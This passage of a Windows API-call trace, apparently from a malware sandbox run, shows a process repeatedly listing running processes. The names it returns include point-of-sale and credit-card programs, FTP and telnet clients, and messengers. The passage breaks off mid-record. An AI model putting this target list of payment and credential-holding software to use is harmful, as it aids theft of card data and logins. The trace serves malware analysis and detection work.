lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0237.390] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0237.392] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0237.393] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0237.395] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0237.397] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0237.398] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0237.400] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0237.402] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0237.404] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0237.405] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0237.407] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0237.408] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0237.410] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0237.412] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0237.413] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0237.415] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0237.416] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0237.440] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0237.443] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0237.445] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0237.446] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0237.448] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0237.450] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0237.452] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.453] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0237.455] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0237.456] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0237.458] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0237.459] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0237.461] CloseHandle (hObject=0x17b0) returned 1 [0237.461] Sleep (dwMilliseconds=0x64) [0237.611] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0237.621] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.623] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0237.624] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0237.626] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.627] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0237.629] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.630] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0237.632] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0237.633] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0237.634] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.636] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.638] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0237.640] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.641] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.643] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.645] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.646] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.648] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.650] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.651] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0237.717] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0237.720] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0237.721] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.723] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.724] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0237.726] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0237.727] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0237.729] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.732] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0237.733] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0237.735] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.736] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0237.737] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0237.739] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0237.740] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0237.742] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0237.743] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0237.745] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0237.747] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0237.748] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0237.750] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0237.751] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0237.752] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0237.754] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0237.755] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0237.757] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0237.758] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0237.759] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0237.761] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0237.795] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0237.796] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0237.798] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0237.799] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 